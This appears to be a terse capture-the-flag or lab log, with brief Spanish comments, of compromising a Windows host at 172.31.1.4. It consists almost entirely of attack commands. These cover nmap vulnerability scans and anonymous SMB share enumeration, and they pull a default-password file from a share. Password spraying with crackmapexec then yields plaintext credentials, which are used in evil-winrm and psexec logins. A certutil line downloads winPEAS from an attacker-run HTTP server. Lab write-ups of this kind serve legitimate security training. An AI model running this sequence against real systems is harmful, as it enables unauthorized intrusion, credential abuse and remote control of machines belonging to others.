nmap -A -p- -oA secret 172.31.1.4 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA secret 172.31.1.4
nmap -sU -O -p- -oA secret-udp 172.31.1.4
smbclient -L \\172.31.1.4 -N 2>/dev/null | grep "Disk"
smbclient -H \\\\172.31.1.4\\Office_Share
get Default_Passwords.txt
Vemos que en la parte anterior encontramos varios usuarios. Hacemos una lista
crackmapexec smb 172.31.1.4 -u username_secret_list.txt -p "SecretOrg!"
Vemos que jcakes es el usuario. jcakes:SecretOrg!
evil-winrm -i 172.31.1.4 -u jcakes -p SecretOrg!
python3 -m http.server 8888
certutil.exe -f -split -urlcache http://10.10.0.12:8888/winPEASany.exe winPEASany.exe
crackmapexec smb 172.31.1.4 -u username_secret_list.txt -p "vF4$x9#z:-eT~Fy"
python3 /opt/impacket/examples/psexec.py SECRET/bdover:'vF4$x9#z:-eT~Fy'@172.31.1.4